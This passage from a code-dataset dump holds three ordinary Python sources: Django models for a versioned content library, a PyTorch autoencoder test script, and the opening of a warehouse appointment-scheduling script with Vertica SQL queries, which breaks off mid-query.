mt.mimeextension_set.all()[0].extension\n except MimeType.DoesNotExist:\n pass\n if exten is None:\n exten = os.path.splitext(self.contentfile.name)[1]\n if draft_path:\n path = self.draft_path()\n else:\n path = self.full_path()\n res = dict(name=self.name,\n id=self.id,\n description=self.name,\n version=self.version,\n path=self.full_path(),\n dimensions=dims,\n mimetype=self.mime_type,\n detected_meta_data=meta,\n extension=exten,\n url=self.contentfile.url,)\n return res\n\n def ajax_json(self, draft_path=False):\n return json.dumps(self.ajax_json_data(draft_path))\n\n class Meta:\n app_label = 'mcms'\n unique_together = [('name','installed_path','version',),]\n\n\ndef file_hash(path):\n \"\"\"\n Generate an MD5 hash of the file passed in.\n \"\"\"\n with open(path, 'rb') as handle:\n hasher = hashlib.md5()\n while True:\n data = handle.read(8192)\n if not data:\n break\n hasher.update(data)\n return hasher.hexdigest()\n\n\nclass ImportItem(models.Model):\n contentfile = models.FileField(upload_to=\"libuploads/pending/%Y/%m/%d\")\n name = models.CharField(max_length=50)\n description = models.CharField(max_length=1024, null=True, blank=True)\n requested_path = models.TextField(null=True, blank=True)\n mime_type = models.CharField(max_length=50, null=True, blank=True)\n detected_meta_data = models.CharField(max_length=1024, null=True, blank=True)\n dimensions = models.CharField(max_length=50, null=True, blank=True)\n installed_item = models.ForeignKey(CItem, null=True, blank=True, db_index=True)\n edit = models.ForeignKey(Edit)\n md5_hash = models.CharField(max_length=128, null=True, blank=True)\n\n def __unicode__(self):\n msg = str(self.id)\n if self.description:\n msg += \" \" + self.description\n return msg\n\n def full_path(self):\n return self.requested_path + \"/\" + self.name\n\n def detect_type(self):\n if self.mime_type is None:\n text = magic.from_file(self.contentfile.path)\n mime = magic.from_file(self.contentfile.path, magic.MAGIC_MIME)\n if mime.startswith(\"image\"):\n im = Image.open(self.contentfile.path)\n image_meta = im.info\n meta = dict()\n meta['size'] = im.size\n meta['format'] = im.format\n meta['mode'] = im.mode\n meta = json.dumps(meta)\n dim = {'width': im.size[0],\n 'height': im.size[1]}\n else:\n dim = None\n meta = text\n self.mime_type = mime\n self.detected_meta_data = meta\n self.dimensions = json.dumps(dim)\n self.save()\n\n if self.dimensions:\n dim = json.loads(self.dimensions)\n else:\n dim = None\n\n if not self.md5_hash:\n self.md5_hash = file_hash(self.contentfile.path)\n\n return dict(mime_type=self.mime_type,\n description=self.detected_meta_data,\n dimensions=dim)\n\n def detect_type_display(self):\n data = self.detect_type()\n res = data['mime_type']\n if data['mime_type'].startswith('image'):\n dim = data['dimensions']\n res += \" %dx%d\" % (dim['width'], dim['height'])\n else:\n res += \" \" + self.detected_meta_data\n return res\n\n class Meta:\n app_label = 'mcms'\n\n\nclass CItemPathManager(TreeManager):\n \"\"\"\n Provides custom model manager methods for working with :class:`CItemPath`\n instances.\n\n When working with :class:`CItemPath` instances, it is important to note\n that string representations of the trees of ``CItemPath`` instances that form\n full paths in the Content Library's logical filesystem may be either\n \"absolute\" or \"relative\" according to the following definitions:\n\n Absolute Path:\n The string representation of a ``CItemPath`` that includes the path\n from the root of the Content Library's logical filesytem to the\n ``Draft`` instance with which the path is associated.\n\n Relative Path:\n The string representation of a ``CItemPath`` that does **not** include\n the path from the root of the Content Library's logical filesytem to\n the ``Draft`` instance with which the path is associated.\n\n The string representation for Relative Paths still begin with a forward\n slash, which is why they are sometimes referred to in the code as\n \"relative full paths\".\n\n Given a ``Draft`` named \"foo\" and subpaths named \"bar\" and \"baz\",\n therefore, here are the string representations of both the absolute and\n relative paths to \"baz\":\n\n Absolute Path: \"/Drafts/foo/bar/baz\"\n Relative Path: \"/bar/baz\"\n \"\"\"\n def create_from_path(self, user, path, draft, edit=None):\n \"\"\"\n Creates the :class`CItemPath` instance and all necessary parent\n :class:`CItemPath` instances specified by the \"absolute\" or \"relative\"\n :attr:`path` string and the associated attr:`draft`, and returns the\n leaf :class:`CItemPath` instance.\n\n If the specified path already exists, it will simply be returned.\n \"\"\"\n last = None\n path_data = path_drafter(path, draft)\n # Skip leading and trailing forward slashes\n tpath = path_data['rel_path'].strip('/')\n draft_path = draft.get_citem_path()\n last = draft_path\n if tpath:\n for part in tpath.split(\"/\"):\n try:\n current = self.get(name=part, parent=last)\n except CItemPath.DoesNotExist:\n if edit is None:\n edit = Edit.objects.create(\n user=user, source='manual', draft=draft)\n current = self.create(name=part, parent=last, draft=draft)\n CItemPathChange.objects.create(\n old=None, new=current, edit=edit)\n last = current\n return last\n\n def find_by_path(self, path, draft=None):\n \"\"\"\n Returns the :class:`CItemPath` instance specified by the requested\n \"absolute\" or \"relative\" :attr:`path` string.\n\n If a \"relative\" :attr:`path` is given, its associated :class:`Draft`\n instance must also be specified.\n \"\"\"\n last = None\n path_data = path_drafter(path, draft)\n draft = path_data['draft']\n # Skip leading and trailing forward slashes\n tpath = path_data['full_path'].strip('/')\n for part in tpath.split('/'):\n try:\n if last is None:\n current = self.get(name=part, parent__isnull=True)\n else:\n current = self.get(name=part, parent=last)\n except CItemPath.DoesNotExist:\n return None\n last = current\n return last\n\n\nclass CItemPath(MPTTModel):\n name = models.CharField(max_length=50)\n parent = TreeForeignKey('self', null=True, blank=True, related_name='children')\n citems = models.ManyToManyField(CItem, blank=True, null=True)\n draft = models.ForeignKey(Draft)\n objects = CItemPathManager()\n\n def __unicode__(self):\n return self.name\n\n def save(self, *args,**kwargs):\n if self.parent is None:\n if self.name != \"Editions\" and self.name != \"Drafts\":\n raise ValueError('if path is a root, it must be either editions or drafts')\n super(CItemPath, self).save(*args,**kwargs)\n\n def to_path(self):\n path = list()\n path.append(\"\")\n for x in self.get_ancestors():\n path.append(x.name)\n path.append(self.name)\n return \"/\".join(path)\n\n def draft_path(self):\n # skip level one \"Drafts\" and two \"draft.name\"\n tmp = self.to_path().split(\"/\")\n return \"/\" + '/'.join(tmp[3:])\n\n def ajax_json_data(self, draft_path=False):\n if draft_path:\n path = self.draft_path()\n else:\n path = self.to_path()\n\n res = dict(name=self.name,\n item_count=self.citems.count(),\n id=self.id,\n path=path,\n )\n return res\n\n def ajax_json(self, draft_path=False):\n return json.dumps(self.ajax_json_data(draft_path=draft_path))\n\n class MPTTMeta:\n order_insertion_by = ['name']\n\n class Meta:\n app_label = 'mcms'\n unique_together = [('name', 'parent',),]\n\n\nclass CItemPathChange(models.Model):\n old = models.ForeignKey(CItemPath, related_name=\"source\", null=True, blank=True)\n new = models.ForeignKey(CItemPath, related_name=\"dest\", null=True, blank=True)\n edit = models.ForeignKey(Edit)\n\n class Meta:\n app_label = 'mcms'\n\n\nclass Edition(models.Model):\n name = models.CharField(max_length=1024, unique=True)\n create_time = models.DateTimeField(default=timezone.now)\n previous_edition = models.ForeignKey('Edition', related_name='previous', null=True, blank=True)\n source_draft = models.ForeignKey(Draft)\n\n def __unicode__(self):\n return self.name\n\n def get_item_count(self):\n # there can be only one\n q = self.editionitems_set.all()\n if q.count() == 0:\n return 0\n return q[0].citems.all().count()\n\n def get_citem_path(self):\n return self.source_draft.get_citem_path()\n \n def clone_to_draft(self, name):\n return self.source_draft.clone(name)\n\n class Meta:\n app_label = 'mcms'\n\n\nclass EditionItems(models.Model):\n edition = models.ForeignKey(Edition, unique=True)\n citems = models.ManyToManyField(CItem, null=True, blank=True)\n\n class Meta:\n app_label = 'mcms'\n", "sub_path": "mcms/baseclib/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 28869, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.db.models.Manager", "line_number": 23, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 23, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 36, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 36, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 37, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User", "line_number": 37, "usage_type": "argument"}, {"api_name": "django.db.models", "line_number": 37, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 38, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 38, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 39, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 39, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 39, "usage_type": "attribute"}, {"api_name": "django.utils.timezone", "line_number": 39, "usage_type": "name"}, {"api_name": "django.db.models.ManyToManyField", "line_number": 40, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 40, "usage_type": "name"}, {"api_name": "django.db.models.BooleanField", "line_number": 41, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 41, "usage_type": "name"}, {"api_name": "django.db.models.BooleanField", "line_number": 42, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 42, "usage_type": "name"}, {"api_name": "django.db.models.ManyToManyField", "line_number": 43, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User", "line_number": 43, "usage_type": "argument"}, {"api_name": "django.db.models", "line_number": 43, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 52, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 52, "usage_type": "name"}, {"api_name": "django.db.transaction.commit_on_success", "line_number": 124, "usage_type": "attribute"}, {"api_name": "django.db.transaction", "line_number": 124, "usage_type": "name"}, {"api_name": "django.db.transaction.commit_on_success", "line_number": 165, "usage_type": "attribute"}, {"api_name": "django.db.transaction", "line_number": 165, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 204, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 204, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 205, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 205, "usage_type": "name"}, {"api_name": "django.db.models.ManyToManyField", "line_number": 206, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 206, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 215, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 215, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 216, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User", "line_number": 216, "usage_type": "argument"}, {"api_name": "django.db.models", "line_number": 216, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 217, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 217, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 217, "usage_type": "attribute"}, {"api_name": "django.utils.timezone", "line_number": 217, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 218, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 218, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 219, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 219, "usage_type": "name"}, {"api_name": "django.db.models.BooleanField", "line_number": 220, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 220, "usage_type": "name"}, {"api_name": "django.db.models.Manager", "line_number": 229, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 229, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 267, "usage_type": "call"}, {"api_name": "os.path", "line_number": 267, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 269, "usage_type": "call"}, {"api_name": "os.path", "line_number": 269, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 276, "usage_type": "call"}, {"api_name": "os.path", "line_number": 276, "usage_type": "attribute"}, {"api_name": "django.db.models.Max", "line_number": 307, "usage_type": "call"}, {"api_name": "django.core.files.File", "line_number": 321, "usage_type": "call"}, {"api_name": "django.db.transaction.commit_on_success", "line_number": 231, "usage_type": "attribute"}, {"api_name": "django.db.transaction", "line_number": 231, "usage_type": "name"}, {"api_name": "os.path.split", "line_number": 352, "usage_type": "call"}, {"api_name": "os.path", "line_number": 352, "usage_type": "attribute"}, {"api_name": "django.db.models.Model", "line_number": 401, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 401, "usage_type": "name"}, {"api_name": "django.db.models.FileField", "line_number": 402, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 402, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 403, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 403, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 404, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 404, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 405, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 405, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 406, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 406, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 407, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 407, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 408, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 408, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 410, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 410, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 411, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 411, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 414, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 414, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 415, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 415, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 459, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 463, "usage_type": "call"}, {"api_name": "mimemap.models.MimeType.objects.get", "line_number": 470, "usage_type": "call"}, {"api_name": "mimemap.models.MimeType.objects", "line_number": 470, "usage_type": "attribute"}, {"api_name": "mimemap.models.MimeType", "line_number": 470, "usage_type": "name"}, {"api_name": "mimemap.models.MimeType.DoesNotExist", "line_number": 473, "usage_type": "attribute"}, {"api_name": "mimemap.models.MimeType", "line_number": 473, "usage_type": "name"}, {"api_name": "os.path.splitext", "line_number": 476, "usage_type": "call"}, {"api_name": "os.path", "line_number": 476, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 494, "usage_type": "call"}, {"api_name": "hashlib.md5", "line_number": 506, "usage_type": "call"}, {"api_name": "django.db.models.Model", "line_number": 515, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 515, "usage_type": "name"}, {"api_name": "django.db.models.FileField", "line_number": 516, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 516, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 517, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 517, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 518, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 518, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 519, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 519, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 520, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 520, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 521, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 521, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 522, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 522, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 523, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 523, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 524, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 524, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 525, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 525, "usage_type": "name"}, {"api_name": "magic.from_file", "line_number": 538, "usage_type": "call"}, {"api_name": "magic.from_file", "line_number": 539, "usage_type": "call"}, {"api_name": "magic.MAGIC_MIME", "line_number": 539, "usage_type": "attribute"}, {"api_name": "Image.open", "line_number": 541, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 547, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 555, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 559, "usage_type": "call"}, {"api_name": "mptt.models.TreeManager", "line_number": 584, "usage_type": "name"}, {"api_name": "mptt.models.MPTTModel", "line_number": 669, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 670, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 670, "usage_type": "name"}, {"api_name": "mptt.models.TreeForeignKey", "line_number": 671, "usage_type": "call"}, {"api_name": "django.db.models.ManyToManyField", "line_number": 672, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 672, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 673, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 673, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 712, "usage_type": "call"}, {"api_name": "django.db.models.Model", "line_number": 722, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 722, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 723, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 723, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 724, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 724, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 725, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 725, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 731, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 731, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 732, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 732, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 733, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 733, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 733, "usage_type": "attribute"}, {"api_name": "django.utils.timezone", "line_number": 733, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 734, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 734, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 735, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 735, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 757, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 757, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 758, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 758, "usage_type": "name"}, {"api_name": "django.db.models.ManyToManyField", "line_number": 759, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 759, "usage_type": "name"}]} +{"seq_id": "337107966", "text": "import argparse\nimport json\nimport os\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom torch.utils.data import DataLoader\n\nimport logger\nfrom image_folder import ImageFolder720p\nfrom models.cae_32x32x32_zero_pad_bin import CAE\nfrom utils import save_imgs\n\n\ndef test(cfg):\n\tos.makedirs(f\"./test/{cfg['exp_name']}\", exist_ok=True)\n\n\tmodel = CAE().cuda()\n\n\tmodel.load_state_dict(torch.load(cfg['chkpt']))\n\tmodel.eval()\n\tlogger.info(\"Loaded model from\", cfg['chkpt'])\n\n\tdataset = ImageFolder720p(cfg['dataset_path'])\n\tdataloader = DataLoader(dataset, batch_size=1, shuffle=cfg['shuffle'])\n\tlogger.info(f\"Done setup dataloader: {len(dataloader)}\")\n\n\tmse_loss = nn.MSELoss()\n\n\tfor bi, (img, patches, path) in enumerate(dataloader):\n\n\t\tout = torch.zeros(6, 10, 3, 128, 128)\n\t\t# enc = torch.zeros(6, 10, 16, 8, 8)\n\t\tavg_loss = 0\n\n\t\tfor i in range(6):\n\t\t\tfor j in range(10):\n\t\t\t\tx = Variable(patches[:, :, i, j, :, :]).cuda()\n\t\t\t\ty = model(x)\n\n\t\t\t\t# e = model.enc_x.data\n\t\t\t\t# p = torch.tensor(np.random.permutation(e.reshape(-1, 1)).reshape(1, 16, 8, 8)).cuda()\n\t\t\t\t# out[i, j] = model.decode(p).data\n\n\t\t\t\t# enc[i, j] = model.enc_x.data\n\t\t\t\tout[i, j] = y.data\n\n\t\t\t\tloss = mse_loss(y, x)\n\t\t\t\tavg_loss += (1 / 60) * loss.item()\n\n\t\tlogger.debug('[%5d/%5d] avg_loss: %f' % (bi, len(dataloader), avg_loss))\n\n\t\t# save output\n\t\tout = np.transpose(out, (0, 3, 1, 4, 2))\n\t\tout = np.reshape(out, (768, 1280, 3))\n\t\tout = np.transpose(out, (2, 0, 1))\n\n\t\ty = torch.cat((img[0], out), dim=2)\n\t\tsave_imgs(imgs=y.unsqueeze(0), to_size=(3, 768, 2 * 1280), name=f\"./test/{cfg['exp_name']}/test_{bi}.png\")\n\n\n# save encoded\n# enc = np.reshape(enc, -1)\n# sz = str(len(enc)) + 'd'\n# open(f\"./{cfg['exp_name']}/test_{bi}.enc\", \"wb\").write(struct.pack(sz, *enc))\n\ndef main(args):\n\tcfg = json.load(open(args.cfg, \"rt\"))\n\ttest(cfg)\n\n\nif __name__ == '__main__':\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('--cfg', type=str, required=True)\n\tmain(parser.parse_args())\n", "sub_path": "test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 1992, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "os.makedirs", "line_number": 18, "usage_type": "call"}, {"api_name": "models.cae_32x32x32_zero_pad_bin.CAE", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 22, "usage_type": "call"}, {"api_name": "logger.info", "line_number": 24, "usage_type": "call"}, {"api_name": "image_folder.ImageFolder720p", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 27, "usage_type": "call"}, {"api_name": "logger.info", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.nn.MSELoss", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 30, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 40, "usage_type": "call"}, {"api_name": "logger.debug", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 60, "usage_type": "call"}, {"api_name": "utils.save_imgs", "line_number": 61, "usage_type": "call"}, {"api_name": "json.load", "line_number": 70, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 75, "usage_type": "call"}]} +{"seq_id": "259742840", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Oct 8 14:19:54 2019\r\n\r\n@author: AA-VManohar\r\n\"\"\"\r\n\r\n\r\ntry:\r\n import logging\r\n import logging.handlers\r\n import csv\r\n import pandas as pd\r\n import pyodbc\r\n import datetime as dtm\r\n from gurobipy import *\r\n import time\r\n import smtplib\r\n from email.mime.multipart import MIMEMultipart\r\n from email.mime.text import MIMEText\r\n from email.mime.base import MIMEBase\r\n from email import encoders\r\n start_time = time.time()\r\n #inputs\r\n out_1 = {}\r\n out_2 = {}\r\n out_3 = {}\r\n out_copy = {}\r\n missed_ref =[]\r\n infeas_shift ={}\r\n infeasible_day = {}\r\n infeas_ref = []\r\n date_fl = {}\r\n #a = 1.10\r\n objec = {}\r\n M1 = 0\r\n M2 = 0\r\n sch_sh_check = {}\r\n TODAY = dtm.datetime.today()\r\n exp_units = {}\r\n exp_sku = {}\r\n slot_count = {}\r\n logger = logging.getLogger('DFW_run')\r\n logger.setLevel(logging.DEBUG)\r\n rh = logging.handlers.RotatingFileHandler('ISO_process.log',maxBytes = 500*1024,backupCount = 1)\r\n rh.setLevel(logging.DEBUG)\r\n ch = logging.StreamHandler()\r\n ch.setLevel(logging.DEBUG)\r\n formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(name)s - %(message)s')\r\n rh.setFormatter(formatter)\r\n ch.setFormatter(formatter)\r\n if (logger.hasHandlers()):\r\n logger.handlers.clear()\r\n logger.addHandler(rh)\r\n logger.addHandler(ch)\r\n today = dtm.datetime.today().date()\r\n for i in range(1,108):\r\n a = today + dtm.timedelta(days = i-15)\r\n if a.weekday() == 4:\r\n date_fl[str(a)] = '1'\r\n elif a.weekday() in [0,1,2,3]:\r\n date_fl[str(a)] = '0'\r\n else:\r\n pass\r\n \r\n #giving slots \r\n day_slots={'0': ['05:30:00','06:00:00','06:30:00','07:30:00','08:00:00','08:30:00','09:00:00','09:30:00','10:00:00','11:00:00'],\r\n '1':['05:30:00','06:00:00','06:30:00','07:00:00','07:30:00','08:00:00','08:30:00','09:00:00','10:00:00','11:00:00','12:00:00','12:30:00','13:00:00','13:30:00','14:00:00','15:00:00','15:30:00','16:00:00']}\r\n night_slots={'0':['16:00:00','16:30:00','17:00:00','17:30:00','19:00:00','19:30:00','20:00:00','20:30:00'],\r\n '1':[]}\r\n cxn = pyodbc.connect(\"DSN=BIDB\",autocommit = True)\r\n cur = cxn.cursor()\r\n logger.info(\"Vertica is Connected\")\r\n std_no = {\r\n ('9011','16:30:00') : '271',\r\n ('9000','06:30:00') : '266',\r\n ('9000','17:00:00') : '376',\r\n ('9282','06:30:00') : '329',\r\n ('9282','09:00:00') : '325',\r\n ('9283','08:00:00') : '327',\r\n ('9283','09:00:00') : '372',\r\n ('9285','07:30:00') : '273',\r\n ('000000012','09:00:00') : '640',\r\n ('00000002','22:45:00') : '369',\r\n ('00000004','10:00:00') : '602',\r\n ('00000007','21:45:00') : '368'\r\n }\r\n #Sch_units, Sch_SKU and Sch_appt at day level\r\n query = \"\"\"\r\n SELECT apl.request_date:: DATE, SUM(pdp.qty) AS IB_units, COUNT(pdp.item_number) AS SKU, COUNT(DISTINCT apl.appointment_id) AS slots\r\n FROM aad.t_appt_appointment_log AS apl\r\n JOIN aad.t_appt_appointment_log_po AS pol\r\n USING(appointment_id)\r\n JOIN aad.t_po_detail AS pdp\r\n ON pdp.po_number = pol.po_number\r\n WHERE apl.wh_id = 'DFW1' AND LOWER(apl.status) <> 'cancelled' AND apl.request_date:: DATE > current_date and dayofweek(apl.request_date:: DATE) NOT IN (6,7)\r\n GROUP BY 1\r\n ORDER BY 1\r\n \"\"\"\r\n df = pd.read_sql(query,cxn)\r\n df.columns = ['date','U','S','Sl']\r\n sch_dict = dict([str(i),[int(j),int(k),int(l)]] for i,j,k,l in zip(df.date,df.U,df.S,df.Sl))\r\n #Sch_appt at slot level\r\n query = \"\"\"\r\n SELECT apl.request_date:: DATE, apl.request_time:: TIME,COUNT(DISTINCT apl.appointment_id) AS slots\r\n FROM aad.t_appt_appointment_log AS apl\r\n JOIN aad.t_appt_appointment_log_po AS pol\r\n USING(appointment_id)\r\n WHERE apl.wh_id = 'DFW1' AND LOWER(apl.status) <> 'cancelled' AND apl.request_date:: DATE > current_date and dayofweek(apl.request_date:: DATE) NOT IN (6,7)\r\n GROUP BY 1,2\r\n ORDER BY 1,2\r\n \"\"\"\r\n df = pd.read_sql(query,cxn)\r\n df.columns = ['dt','t','s']\r\n sch_slot = dict([(str(i),str(j)),int(k)] for i,j,k in zip(df.dt,df.t,df.s))\r\n \r\n #Sch_units, Sch_SKU and Sch_appt at day and shift level\r\n query = \"\"\"\r\n SELECT apl.request_date:: DATE,CASE WHEN apl.request_time:: TIME BETWEEN '04:00:00' AND '14:30:00' THEN 1 ELSE 2 END AS shift, SUM(pdp.qty) AS IB_units, COUNT(DISTINCT pdp.item_number) AS SKU, COUNT(DISTINCT apl.appointment_id) AS slots\r\n FROM aad.t_appt_appointment_log AS apl\r\n JOIN aad.t_appt_appointment_log_po AS pol\r\n USING(appointment_id)\r\n JOIN aad.t_po_detail AS pdp\r\n ON pdp.po_number = pol.po_number\r\n WHERE apl.wh_id = 'DFW1' AND LOWER(apl.status) <> 'cancelled' AND apl.request_date:: DATE > current_date and dayofweek(apl.request_date:: DATE) NOT IN (6,7)\r\n GROUP BY 1,2\r\n ORDER BY 1,2\r\n \"\"\"\r\n df = pd.read_sql(query,cxn)\r\n df.columns = ['dt','sh','u','s','sl']\r\n sch_sh = dict([(str(i),str(j)),[int(k),int(l),int(m)]] for i,j,k,l,m in zip(df.dt,df.sh,df.u,df.s,df.sl))\r\n logger.info(\"HJ data are collected\")\r\n \r\n #Getting S&OP forecast\r\n query = \"\"\"\r\n with FC_max_date as\r\n (\r\n select distinct date::date,wh_id,max(scrape_update_dttm) as max_date \r\n from sandbox_fulfillment.t_labor_model_inbound_forward_looking_capacity_new \r\n --where date::date = scrape_update_dttm::date + 14 --rolling 14 day lock\r\n --date_trunc('week',date::date+1)-1 = timestampadd('week',2,date_trunc('week',scrape_update_dttm+1)-1) --2 week lock\r\n group by 1,2\r\n )\r\n select iblm.wh_id,iblm.scrape_update_dttm,iblm.date::date as date,\r\n ROUND(abs(iblm.planned_operations_units_received),0) AS planned_operations_units_received ,\r\n ROUND(abs(iblm.planned_operations_units_received),0)-ROUND(abs(iblm.planned_units_received_nights),0) as planned_units_received_days,\r\n ROUND(abs(iblm.planned_units_received_nights),0) AS planned_units_received_nights \r\n from sandbox_fulfillment.t_labor_model_inbound_forward_looking_capacity_new iblm\r\n join FC_max_date fmd on iblm.scrape_update_dttm = fmd.max_date and iblm.wh_id = fmd.wh_id and iblm.date::date = fmd.date\r\n where iblm.date::date 